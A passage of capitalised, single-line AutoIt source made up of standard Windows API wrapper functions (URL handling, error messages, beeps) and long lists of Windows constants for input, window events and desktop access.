ENDIF LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "Shell_GetImageLists" , "ptr" , $PLARGE , "ptr" , $PSMALL ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TPTR , 1 ) ENDFUNC FUNC _WINAPI_URLAPPLYSCHEME ($SURL , $IFLAGS = 1 ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "UrlApplySchemeW" , "wstr" , $SURL , "wstr" , "" , "dword*" , 4096 , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_URLCANONICALIZE ($SURL , $IFLAGS ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "UrlCanonicalizeW" , "wstr" , $SURL , "wstr" , "" , "dword*" , 4096 , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_URLCOMBINE ($SURL , $SPART , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "UrlCombineW" , "wstr" , $SURL , "wstr" , $SPART , "wstr" , "" , "dword*" , 4096 , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) RETURN $ARET [3 ] ENDFUNC FUNC _WINAPI_URLCOMPARE ($SURL1 , $SURL2 , $BIGNORESLASH = FALSE ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "int" , "UrlCompareW" , "wstr" , $SURL1 , "wstr" , $SURL2 , "bool" , $BIGNORESLASH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_URLCREATEFROMPATH ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "UrlCreateFromPathW" , "wstr" , $SFILEPATH , "wstr" , "" , "dword*" , 4096 , "dword" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] < 0 OR $ARET [0 ] > 1 THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) ENDIF RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_URLFIXUP ($SURL ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "UrlFixupW" , "wstr" , $SURL , "wstr" , "" , "dword" , 4096 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_URLGETPART ($SURL , $IPART ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "UrlGetPartW" , "wstr" , $SURL , "wstr" , "" , "dword*" , 4096 , "dword" , $IPART , "dword" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_URLHASH ($SURL , $ILENGTH = 32 ) IF $ILENGTH <= 0 OR $ILENGTH > 256 THEN RETURN SETERROR (256 , 0 , 0 ) LOCAL $TDATA = DLLSTRUCTCREATE ("byte[" & $ILENGTH & "]" ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "UrlHashW" , "wstr" , $SURL , "struct*" , $TDATA , "dword" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN DLLSTRUCTGETDATA ($TDATA , 1 ) ENDFUNC FUNC _WINAPI_URLIS ($SURL , $ITYPE = 0 ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "UrlIsW" , "wstr" , $SURL , "uint" , $ITYPE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC #EndRegion Public Functions #Region Internal Functions FUNC __US ($SSTRING , $ILENGTH = 0 ) IF $ILENGTH THEN $SSTRING = STRINGLEFT ($SSTRING , $ILENGTH ) ELSE $ILENGTH = STRINGLEN ($SSTRING ) ENDIF LOCAL $TUS = DLLSTRUCTCREATE ("ushort;ushort;ptr;wchar[" & ($ILENGTH + 1 ) & "]" ) DLLSTRUCTSETDATA ($TUS , 1 , 2 * STRINGLEN ($SSTRING ) ) DLLSTRUCTSETDATA ($TUS , 2 , 2 * $ILENGTH ) DLLSTRUCTSETDATA ($TUS , 3 , DLLSTRUCTGETPTR ($TUS , 4 ) ) DLLSTRUCTSETDATA ($TUS , 4 , $SSTRING ) RETURN $TUS ENDFUNC #EndRegion Internal Functions GLOBAL CONST $KLF_ACTIVATE = 1 GLOBAL CONST $KLF_NOTELLSHELL = 128 GLOBAL CONST $KLF_REORDER = 8 GLOBAL CONST $KLF_REPLACELANG = 16 GLOBAL CONST $KLF_RESET = 1073741824 GLOBAL CONST $KLF_SETFORPROCESS = 256 GLOBAL CONST $KLF_SHIFTLOCK = 65536 GLOBAL CONST $KLF_SUBSTITUTE_OK = 2 GLOBAL CONST $HKL_NEXT = 1 GLOBAL CONST $HKL_PREV = 0 GLOBAL CONST $AW_ACTIVATE = 131072 GLOBAL CONST $AW_BLEND = 524288 GLOBAL CONST $AW_CENTER = 16 GLOBAL CONST $AW_HIDE = 65536 GLOBAL CONST $AW_HOR_NEGATIVE = 2 GLOBAL CONST $AW_HOR_POSITIVE = 1 GLOBAL CONST $AW_SLIDE = 262144 GLOBAL CONST $AW_VER_NEGATIVE = 8 GLOBAL CONST $AW_VER_POSITIVE = 4 GLOBAL CONST $BSF_ALLOWSFW = 128 GLOBAL CONST $BSF_FLUSHDISK = 4 GLOBAL CONST $BSF_FORCEIFHUNG = 32 GLOBAL CONST $BSF_IGNORECURRENTTASK = 2 GLOBAL CONST $BSF_NOHANG = 8 GLOBAL CONST $BSF_NOTIMEOUTIFNOTHUNG = 64 GLOBAL CONST $BSF_POSTMESSAGE = 16 GLOBAL CONST $BSF_QUERY = 1 GLOBAL CONST $BSF_SENDNOTIFYMESSAGE = 256 GLOBAL CONST $BSM_ALLCOMPONENTS = 0 GLOBAL CONST $BSM_ALLDESKTOPS = 8 GLOBAL CONST $BSM_APPLICATIONS = 16 GLOBAL CONST $BSM_INSTALLABLEDRIVERS = 4 GLOBAL CONST $BSM_NETDRIVER = 2 GLOBAL CONST $BSM_VXDS = 1 GLOBAL CONST $MDITILE_HORIZONTAL = 1 GLOBAL CONST $MDITILE_SKIPDISABLED = 2 GLOBAL CONST $MDITILE_VERTICAL = 0 GLOBAL CONST $MDITILE_ZORDER = 4 GLOBAL CONST $MSGFLT_ALLOW = 1 GLOBAL CONST $MSGFLT_DISALLOW = 2 GLOBAL CONST $MSGFLT_RESET = 0 GLOBAL CONST $MSGFLTINFO_ALLOWED_HIGHER = 3 GLOBAL CONST $MSGFLTINFO_ALREADYALLOWED_FORWND = 1 GLOBAL CONST $MSGFLTINFO_ALREADYDISALLOWED_FORWND = 2 GLOBAL CONST $MSGFLTINFO_NONE = 0 GLOBAL CONST $CWP_ALL = 0 GLOBAL CONST $CWP_SKIPINVISIBLE = 1 GLOBAL CONST $CWP_SKIPDISABLED = 2 GLOBAL CONST $CWP_SKIPTRANSPARENT = 4 GLOBAL CONST $COMPRESSION_FORMAT_NONE = 0 GLOBAL CONST $COMPRESSION_FORMAT_DEFAULT = 1 GLOBAL CONST $COMPRESSION_FORMAT_LZNT1 = 2 GLOBAL CONST $COMPRESSION_FORMAT_XPRESS = 3 GLOBAL CONST $COMPRESSION_FORMAT_XPRESS_HUFF = 4 GLOBAL CONST $COMPRESSION_ENGINE_STANDARD = 0 GLOBAL CONST $COMPRESSION_ENGINE_MAXIMUM = 256 GLOBAL CONST $COMPRESSION_ENGINE_HIBER = 512 GLOBAL CONST $WINSTA_ACCESSCLIPBOARD = 4 GLOBAL CONST $WINSTA_ACCESSGLOBALATOMS = 32 GLOBAL CONST $WINSTA_CREATEDESKTOP = 8 GLOBAL CONST $WINSTA_ENUMDESKTOPS = 1 GLOBAL CONST $WINSTA_ENUMERATE = 256 GLOBAL CONST $WINSTA_EXITWINDOWS = 64 GLOBAL CONST $WINSTA_READATTRIBUTES = 2 GLOBAL CONST $WINSTA_READSCREEN = 512 GLOBAL CONST $WINSTA_WRITEATTRIBUTES = 16 GLOBAL CONST $WINSTA_ALL_ACCESS = BITOR ($WINSTA_ACCESSCLIPBOARD , $WINSTA_ACCESSGLOBALATOMS , $WINSTA_CREATEDESKTOP , $WINSTA_ENUMDESKTOPS , $WINSTA_ENUMERATE , $WINSTA_EXITWINDOWS , $WINSTA_READATTRIBUTES , $WINSTA_READSCREEN , $WINSTA_WRITEATTRIBUTES ) GLOBAL CONST $CWF_CREATE_ONLY = 1 GLOBAL CONST $GCL_CBCLSEXTRA = + 4294967276 GLOBAL CONST $GCL_CBWNDEXTRA = + 4294967278 GLOBAL CONST $GCL_HBRBACKGROUND = + 4294967286 GLOBAL CONST $GCL_HCURSOR = + 4294967284 GLOBAL CONST $GCL_HICON = + 4294967282 GLOBAL CONST $GCL_HICONSM = + 4294967262 GLOBAL CONST $GCL_HMODULE = + 4294967280 GLOBAL CONST $GCL_MENUNAME = + 4294967288 GLOBAL CONST $GCL_STYLE = + 4294967270 GLOBAL CONST $GCL_WNDPROC = + 4294967272 GLOBAL CONST $DOCKINFO_DOCKED = 2 GLOBAL CONST $DOCKINFO_UNDOCKED = 1 GLOBAL CONST $DOCKINFO_USER_SUPPLIED = 4 GLOBAL CONST $DOCKINFO_USER_DOCKED = 5 GLOBAL CONST $DOCKINFO_USER_UNDOCKED = 6 GLOBAL CONST $GUI_CARETBLINKING = 1 GLOBAL CONST $GUI_INMENUMODE = 4 GLOBAL CONST $GUI_INMOVESIZE = 2 GLOBAL CONST $GUI_POPUPMENUMODE = 16 GLOBAL CONST $GUI_SYSTEMMENUMODE = 8 GLOBAL CONST $HANDLE_FLAG_INHERIT = 1 GLOBAL CONST $HANDLE_FLAG_PROTECT_FROM_CLOSE = 2 GLOBAL CONST $GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS = 4 GLOBAL CONST $GET_MODULE_HANDLE_EX_FLAG_PIN = 1 GLOBAL CONST $GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT = 2 GLOBAL CONST $GET_MODULE_HANDLE_EX_FLAG_DEFAULT = 0 GLOBAL CONST $PROCESSOR_ARCHITECTURE_AMD64 = 9 GLOBAL CONST $PROCESSOR_ARCHITECTURE_IA64 = 6 GLOBAL CONST $PROCESSOR_ARCHITECTURE_INTEL = 0 GLOBAL CONST $PROCESSOR_ARCHITECTURE_UNKNOWN = 65535 GLOBAL CONST $PROCESSOR_INTEL_386 = 386 GLOBAL CONST $PROCESSOR_INTEL_486 = 486 GLOBAL CONST $PROCESSOR_INTEL_PENTIUM = 586 GLOBAL CONST $PROCESSOR_INTEL_IA64 = 2200 GLOBAL CONST $PROCESSOR_AMD_X8664 = 8664 GLOBAL CONST $UOI_FLAGS = 1 GLOBAL CONST $UOI_HEAPSIZE = 5 GLOBAL CONST $UOI_IO = 6 GLOBAL CONST $UOI_NAME = 2 GLOBAL CONST $UOI_TYPE = 3 GLOBAL CONST $UOI_USER_SID = 4 GLOBAL CONST $DF_ALLOWOTHERACCOUNTHOOK = 1 GLOBAL CONST $WSF_VISIBLE = 1 GLOBAL CONST $VER_SUITE_BACKOFFICE = 4 GLOBAL CONST $VER_SUITE_BLADE = 1024 GLOBAL CONST $VER_SUITE_COMPUTE_SERVER = 16384 GLOBAL CONST $VER_SUITE_DATACENTER = 128 GLOBAL CONST $VER_SUITE_ENTERPRISE = 2 GLOBAL CONST $VER_SUITE_EMBEDDEDNT = 64 GLOBAL CONST $VER_SUITE_PERSONAL = 512 GLOBAL CONST $VER_SUITE_SINGLEUSERTS = 256 GLOBAL CONST $VER_SUITE_SMALLBUSINESS = 1 GLOBAL CONST $VER_SUITE_SMALLBUSINESS_RESTRICTED = 32 GLOBAL CONST $VER_SUITE_STORAGE_SERVER = 8192 GLOBAL CONST $VER_SUITE_TERMINAL = 16 GLOBAL CONST $VER_SUITE_WH_SERVER = 32768 GLOBAL CONST $VER_NT_DOMAIN_CONTROLLER = 2 GLOBAL CONST $VER_NT_SERVER = 3 GLOBAL CONST $VER_NT_WORKSTATION = 1 GLOBAL CONST $WDA_MONITOR = 1 GLOBAL CONST $WDA_NONE = 0 GLOBAL CONST $PF_3DNOW_INSTRUCTIONS_AVAILABLE = 7 GLOBAL CONST $PF_CHANNELS_ENABLED = 16 GLOBAL CONST $PF_COMPARE_EXCHANGE_DOUBLE = 2 GLOBAL CONST $PF_COMPARE_EXCHANGE128 = 14 GLOBAL CONST $PF_COMPARE64_EXCHANGE128 = 15 GLOBAL CONST $PF_FLOATING_POINT_EMULATED = 1 GLOBAL CONST $PF_FLOATING_POINT_PRECISION_ERRATA = 0 GLOBAL CONST $PF_MMX_INSTRUCTIONS_AVAILABLE = 3 GLOBAL CONST $PF_NX_ENABLED = 12 GLOBAL CONST $PF_PAE_ENABLED = 9 GLOBAL CONST $PF_RDTSC_INSTRUCTION_AVAILABLE = 8 GLOBAL CONST $PF_SSE3_INSTRUCTIONS_AVAILABLE = 13 GLOBAL CONST $PF_XMMI_INSTRUCTIONS_AVAILABLE = 6 GLOBAL CONST $PF_XMMI64_INSTRUCTIONS_AVAILABLE = 10 GLOBAL CONST $PF_XSAVE_ENABLED = 17 GLOBAL CONST $KEYEVENTF_EXTENDEDKEY = 1 GLOBAL CONST $KEYEVENTF_KEYUP = 2 GLOBAL CONST $LIM_SMALL = 0 GLOBAL CONST $LIM_LARGE = 1 GLOBAL CONST $MAPVK_VK_TO_CHAR = 2 GLOBAL CONST $MAPVK_VK_TO_VSC = 0 GLOBAL CONST $MAPVK_VK_TO_VSC_EX = 4 GLOBAL CONST $MAPVK_VSC_TO_VK = 1 GLOBAL CONST $MAPVK_VSC_TO_VK_EX = 3 GLOBAL CONST $MOD_ALT = 1 GLOBAL CONST $MOD_CONTROL = 2 GLOBAL CONST $MOD_NOREPEAT = 16384 GLOBAL CONST $MOD_SHIFT = 4 GLOBAL CONST $MOD_WIN = 8 GLOBAL CONST $GUID_ACDC_POWER_SOURCE = "{5D3E9A59-E9D5-4B00-A6BD-FF34FF516548}" GLOBAL CONST $GUID_BATTERY_PERCENTAGE_REMAINING = "{A7AD8041-B45A-4CAE-87A3-EECBB468A9E1}" GLOBAL CONST $GUID_IDLE_BACKGROUND_TASK = "{515C31D8-F734-163D-A0FD-11A08C91E8F1}" GLOBAL CONST $GUID_MONITOR_POWER_ON = "{02731015-4510-4526-99E6-E5A17EBD1AEA}" GLOBAL CONST $GUID_POWERSCHEME_PERSONALITY = "{245D8541-3943-4422-B025-13A784F679B7}" GLOBAL CONST $GUID_SYSTEM_AWAYMODE = "{98A7F580-01F7-48AA-9C0F-44352C29E5C0}" GLOBAL CONST $GUID_MIN_POWER_SAVINGS = "{8C5E7FDA-E8BF-4A96-9A85-A6E23A8C635C}" GLOBAL CONST $GUID_MAX_POWER_SAVINGS = "{A1841308-3541-4FAB-BC81-F71556F20B4A}" GLOBAL CONST $GUID_TYPICAL_POWER_SAVINGS = "{381B4222-F694-41F0-9685-FF5BB260DF2E}" GLOBAL CONST $HSHELL_WINDOWCREATED = 1 GLOBAL CONST $HSHELL_WINDOWDESTROYED = 2 GLOBAL CONST $HSHELL_ACTIVATESHELLWINDOW = 3 GLOBAL CONST $HSHELL_WINDOWACTIVATED = 4 GLOBAL CONST $HSHELL_GETMINRECT = 5 GLOBAL CONST $HSHELL_REDRAW = 6 GLOBAL CONST $HSHELL_TASKMAN = 7 GLOBAL CONST $HSHELL_LANGUAGE = 8 GLOBAL CONST $HSHELL_SYSMENU = 9 GLOBAL CONST $HSHELL_ENDTASK = 10 GLOBAL CONST $HSHELL_ACCESSIBILITYSTATE = 11 GLOBAL CONST $HSHELL_APPCOMMAND = 12 GLOBAL CONST $HSHELL_WINDOWREPLACED = 13 GLOBAL CONST $HSHELL_WINDOWREPLACING = 14 GLOBAL CONST $HSHELL_RUDEAPPACTIVATED = 32772 GLOBAL CONST $HSHELL_FLASH = 32774 GLOBAL CONST $HWND_BROADCAST = 65535 GLOBAL CONST $SMTO_BLOCK = 1 GLOBAL CONST $SMTO_NORMAL = 0 GLOBAL CONST $SMTO_ABORTIFHUNG = 2 GLOBAL CONST $SMTO_NOTIMEOUTIFNOTHUNG = 8 GLOBAL CONST $SMTO_ERRORONEXIT = 32 GLOBAL CONST $INPUTLANGCHANGE_BACKWARD = 4 GLOBAL CONST $INPUTLANGCHANGE_FORWARD = 2 GLOBAL CONST $INPUTLANGCHANGE_SYSCHARSET = 1 GLOBAL CONST $EVENT_MIN = 1 GLOBAL CONST $EVENT_SYSTEM_SOUND = 1 GLOBAL CONST $EVENT_SYSTEM_ALERT = 2 GLOBAL CONST $EVENT_SYSTEM_FOREGROUND = 3 GLOBAL CONST $EVENT_SYSTEM_MENUSTART = 4 GLOBAL CONST $EVENT_SYSTEM_MENUEND = 5 GLOBAL CONST $EVENT_SYSTEM_MENUPOPUPSTART = 6 GLOBAL CONST $EVENT_SYSTEM_MENUPOPUPEND = 7 GLOBAL CONST $EVENT_SYSTEM_CAPTURESTART = 8 GLOBAL CONST $EVENT_SYSTEM_CAPTUREEND = 9 GLOBAL CONST $EVENT_SYSTEM_MOVESIZESTART = 10 GLOBAL CONST $EVENT_SYSTEM_MOVESIZEEND = 11 GLOBAL CONST $EVENT_SYSTEM_CONTEXTHELPSTART = 12 GLOBAL CONST $EVENT_SYSTEM_CONTEXTHELPEND = 13 GLOBAL CONST $EVENT_SYSTEM_DRAGDROPSTART = 14 GLOBAL CONST $EVENT_SYSTEM_DRAGDROPEND = 15 GLOBAL CONST $EVENT_SYSTEM_DIALOGSTART = 16 GLOBAL CONST $EVENT_SYSTEM_DIALOGEND = 17 GLOBAL CONST $EVENT_SYSTEM_SCROLLINGSTART = 18 GLOBAL CONST $EVENT_SYSTEM_SCROLLINGEND = 19 GLOBAL CONST $EVENT_SYSTEM_SWITCHSTART = 20 GLOBAL CONST $EVENT_SYSTEM_SWITCHEND = 21 GLOBAL CONST $EVENT_SYSTEM_MINIMIZESTART = 22 GLOBAL CONST $EVENT_SYSTEM_MINIMIZEEND = 23 GLOBAL CONST $EVENT_SYSTEM_DESKTOPSWITCH = 32 GLOBAL CONST $EVENT_OBJECT_CREATE = 32768 GLOBAL CONST $EVENT_OBJECT_DESTROY = 32769 GLOBAL CONST $EVENT_OBJECT_SHOW = 32770 GLOBAL CONST $EVENT_OBJECT_HIDE = 32771 GLOBAL CONST $EVENT_OBJECT_REORDER = 32772 GLOBAL CONST $EVENT_OBJECT_FOCUS = 32773 GLOBAL CONST $EVENT_OBJECT_SELECTION = 32774 GLOBAL CONST $EVENT_OBJECT_SELECTIONADD = 32775 GLOBAL CONST $EVENT_OBJECT_SELECTIONREMOVE = 32776 GLOBAL CONST $EVENT_OBJECT_SELECTIONWITHIN = 32777 GLOBAL CONST $EVENT_OBJECT_STATECHANGE = 32778 GLOBAL CONST $EVENT_OBJECT_LOCATIONCHANGE = 32779 GLOBAL CONST $EVENT_OBJECT_NAMECHANGE = 32780 GLOBAL CONST $EVENT_OBJECT_DESCRIPTIONCHANGE = 32781 GLOBAL CONST $EVENT_OBJECT_VALUECHANGE = 32782 GLOBAL CONST $EVENT_OBJECT_PARENTCHANGE = 32783 GLOBAL CONST $EVENT_OBJECT_HELPCHANGE = 32784 GLOBAL CONST $EVENT_OBJECT_DEFACTIONCHANGE = 32785 GLOBAL CONST $EVENT_OBJECT_ACCELERATORCHANGE = 32786 GLOBAL CONST $EVENT_OBJECT_INVOKED = 32787 GLOBAL CONST $EVENT_OBJECT_TEXTSELECTIONCHANGED = 32788 GLOBAL CONST $EVENT_OBJECT_CONTENTSCROLLED = 32789 GLOBAL CONST $EVENT_MAX = 2147483647 GLOBAL CONST $WINEVENT_INCONTEXT = 4 GLOBAL CONST $WINEVENT_OUTOFCONTEXT = 0 GLOBAL CONST $WINEVENT_SKIPOWNPROCESS = 2 GLOBAL CONST $WINEVENT_SKIPOWNTHREAD = 1 GLOBAL CONST $TME_CANCEL = 2147483648 GLOBAL CONST $TME_HOVER = 1 GLOBAL CONST $TME_LEAVE = 2 GLOBAL CONST $TME_NONCLIENT = 16 GLOBAL CONST $TME_QUERY = 1073741824 GLOBAL CONST $DESKTOP_CREATEMENU = 4 GLOBAL CONST $DESKTOP_CREATEWINDOW = 2 GLOBAL CONST $DESKTOP_ENUMERATE = 64 GLOBAL CONST $DESKTOP_HOOKCONTROL = 8 GLOBAL CONST $DESKTOP_JOURNALPLAYBACK = 32 GLOBAL CONST $DESKTOP_JOURNALRECORD = 16 GLOBAL CONST $DESKTOP_READOBJECTS = 1 GLOBAL CONST $DESKTOP_SWITCHDESKTOP = 256 GLOBAL CONST $DESKTOP_WRITEOBJECTS = 128 GLOBAL CONST $DESKTOP_ALL_ACCESS = BITOR ($DESKTOP_CREATEMENU , $DESKTOP_CREATEWINDOW , $DESKTOP_ENUMERATE , $DESKTOP_HOOKCONTROL , $DESKTOP_JOURNALPLAYBACK , $DESKTOP_JOURNALRECORD , $DESKTOP_READOBJECTS , $DESKTOP_SWITCHDESKTOP , $DESKTOP_WRITEOBJECTS ) GLOBAL CONST $RIDEV_APPKEYS = 1024 GLOBAL CONST $RIDEV_CAPTUREMOUSE = 512 GLOBAL CONST $RIDEV_DEVNOTIFY = 8192 GLOBAL CONST $RIDEV_EXCLUDE = 16 GLOBAL CONST $RIDEV_EXINPUTSINK = 4096 GLOBAL CONST $RIDEV_INPUTSINK = 256 GLOBAL CONST $RIDEV_NOHOTKEYS = 512 GLOBAL CONST $RIDEV_NOLEGACY = 48 GLOBAL CONST $RIDEV_PAGEONLY = 32 GLOBAL CONST $RIDEV_REMOVE = 1 GLOBAL CONST $RID_HEADER = 268435461 GLOBAL CONST $RID_INPUT = 268435459 GLOBAL CONST $RIM_TYPEHID = 2 GLOBAL CONST $RIM_TYPEKEYBOARD = 1 GLOBAL CONST $RIM_TYPEMOUSE = 0 GLOBAL CONST $RIDI_DEVICENAME = 536870919 GLOBAL CONST $RIDI_DEVICEINFO = 536870923 GLOBAL CONST $RIDI_PREPARSEDDATA = 536870917 GLOBAL CONST $MOUSE_ATTRIBUTES_CHANGED = 4 GLOBAL CONST $MOUSE_MOVE_ABSOLUTE = 1 GLOBAL CONST $MOUSE_MOVE_RELATIVE = 0 GLOBAL CONST $MOUSE_VIRTUAL_DESKTOP = 2 GLOBAL CONST $RI_MOUSE_LEFT_BUTTON_DOWN = 1 GLOBAL CONST $RI_MOUSE_LEFT_BUTTON_UP = 2 GLOBAL CONST $RI_MOUSE_MIDDLE_BUTTON_DOWN = 16 GLOBAL CONST $RI_MOUSE_MIDDLE_BUTTON_UP = 32 GLOBAL CONST $RI_MOUSE_RIGHT_BUTTON_DOWN = 4 GLOBAL CONST $RI_MOUSE_RIGHT_BUTTON_UP = 8 GLOBAL CONST $RI_MOUSE_BUTTON_1_DOWN = $RI_MOUSE_LEFT_BUTTON_DOWN GLOBAL CONST $RI_MOUSE_BUTTON_1_UP = $RI_MOUSE_LEFT_BUTTON_UP GLOBAL CONST $RI_MOUSE_BUTTON_2_DOWN = $RI_MOUSE_RIGHT_BUTTON_DOWN GLOBAL CONST $RI_MOUSE_BUTTON_2_UP = $RI_MOUSE_RIGHT_BUTTON_UP GLOBAL CONST $RI_MOUSE_BUTTON_3_DOWN = $RI_MOUSE_MIDDLE_BUTTON_DOWN GLOBAL CONST $RI_MOUSE_BUTTON_3_UP = $RI_MOUSE_MIDDLE_BUTTON_UP GLOBAL CONST $RI_MOUSE_BUTTON_4_DOWN = 64 GLOBAL CONST $RI_MOUSE_BUTTON_4_UP = 128 GLOBAL CONST $RI_MOUSE_BUTTON_5_DOWN = 256 GLOBAL CONST $RI_MOUSE_BUTTON_5_UP = 512 GLOBAL CONST $RI_MOUSE_WHEEL = 1024 GLOBAL CONST $RI_KEY_BREAK = 1 GLOBAL CONST $RI_KEY_E0 = 2 GLOBAL CONST $RI_KEY_E1 = 4 GLOBAL CONST $RI_KEY_MAKE = 0 #Region Global Variables and Constants GLOBAL CONST $FORMAT_MESSAGE_ALLOCATE_BUFFER = 256 GLOBAL CONST $FORMAT_MESSAGE_IGNORE_INSERTS = 512 GLOBAL CONST $FORMAT_MESSAGE_FROM_STRING = 1024 GLOBAL CONST $FORMAT_MESSAGE_FROM_HMODULE = 2048 GLOBAL CONST $FORMAT_MESSAGE_FROM_SYSTEM = 4096 GLOBAL CONST $FORMAT_MESSAGE_ARGUMENT_ARRAY = 8192 #EndRegion Global Variables and Constants FUNC _WINAPI_BEEP ($IFREQ = 500 , $IDURATION = 1000 ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "Beep" , "dword" , $IFREQ , "dword" , $IDURATION ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_FORMATMESSAGE ($IFLAGS , $PSOURCE , $IMESSAGEID , $ILANGUAGEID , BYREF $PBUFFER , $ISIZE , $VARGUMENTS ) LOCAL $SBUFFERTYPE = "struct*" IF ISSTRING ($PBUFFER ) THEN $SBUFFERTYPE = "wstr" LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "dword" , "FormatMessageW" , "dword" , $IFLAGS , "struct*" , $PSOURCE , "dword" , $IMESSAGEID , "dword" , $ILANGUAGEID , $SBUFFERTYPE , $PBUFFER , "dword" , $ISIZE , "ptr" , $VARGUMENTS ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) IF $SBUFFERTYPE = "wstr" THEN $PBUFFER = $ARESULT [5 ] RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETERRORMESSAGE ($ICODE , $ILANGUAGE = 0 , CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "dword" , "FormatMessageW" , "dword" , 4096 , "ptr" , 0 , "dword" , $ICODE , "dword" , $ILANGUAGE , "wstr" , "" , "dword" , 4096 , "ptr" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN SETERROR ($_ICURRENTERROR , $_ICURRENTEXTENDED , STRINGREGEXPREPLACE ($ARET [5 ] , "[" & @LF & "," & @CR & "]*\Z" , "" ) ) ENDFUNC FUNC _WINAPI_GETLASTERROR (CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "dword" , "GetLastError" ) RETURN SETERROR ($_ICURRENTERROR , $_ICURRENTEXTENDED , $ARESULT [0 ] ) ENDFUNC FUNC _WINAPI_GETLASTERRORMESSAGE (CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED ) LOCAL $ILASTERROR = _WINAPI_GETLASTERROR () LOCAL $TBUFFERPTR = DLLSTRUCTCREATE ("ptr" ) LOCAL $NCOUNT = _WINAPI_FORMATMESSAGE (BITOR ($FORMAT_MESSAGE_ALLOCATE_BUFFER , $FORMAT_MESSAGE_FROM_SYSTEM ) , 0 , $ILASTERROR , 0 , $TBUFFERPTR , 0 , 0 ) IF @ERROR THEN RETURN SETERROR (- @ERROR , @EXTENDED , "" ) LOCAL $STEXT = "" LOCAL $PBUFFER = DLLSTRUCTGETDATA ($TBUFFERPTR , 1 ) IF $PBUFFER THEN IF $NCOUNT > 0 THEN LOCAL $TBUFFER = DLLSTRUCTCREATE ("wchar[" & ($NCOUNT + 1 ) & "]" , $PBUFFER ) $STEXT = DLLSTRUCTGETDATA ($TBUFFER , 1 ) IF STRINGRIGHT ($STEXT , 2 ) = @CRLF THEN $STEXT = STRINGTRIMRIGHT ($STEXT , 2 ) ENDIF DLLCALL ("kernel32.dll" , "handle" , "LocalFree" , "handle" , $PBUFFER ) ENDIF RETURN SETERROR ($_ICURRENTERROR , $_ICURRENTEXTENDED , $STEXT ) ENDFUNC FUNC _WINAPI_MESSAGEBEEP ($ITYPE = 1 ) LOCAL $ISOUND SWITCH $ITYPE CASE 1 $ISOUND = 0 CASE 2 $ISOUND = 16 CASE 3 $ISOUND = 32 CASE 4 $ISOUND = 48 CASE 5 $ISOUND = 64 CASE ELSE $ISOUND = + 4294967295 ENDSWITCH LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "MessageBeep" , "uint" , $ISOUND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_MSGBOX ($IFLAGS , $STITLE , $STEXT ) BLOCKINPUT (0 ) MSGBOX ($IFLAGS , $STITLE , $STEXT & " " ) ENDFUNC FUNC _WINAPI_SETLASTERROR ($IERRORCODE , CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED ) DLLCALL ("kernel32.dll" , "none" , "SetLastError" , "dword" , 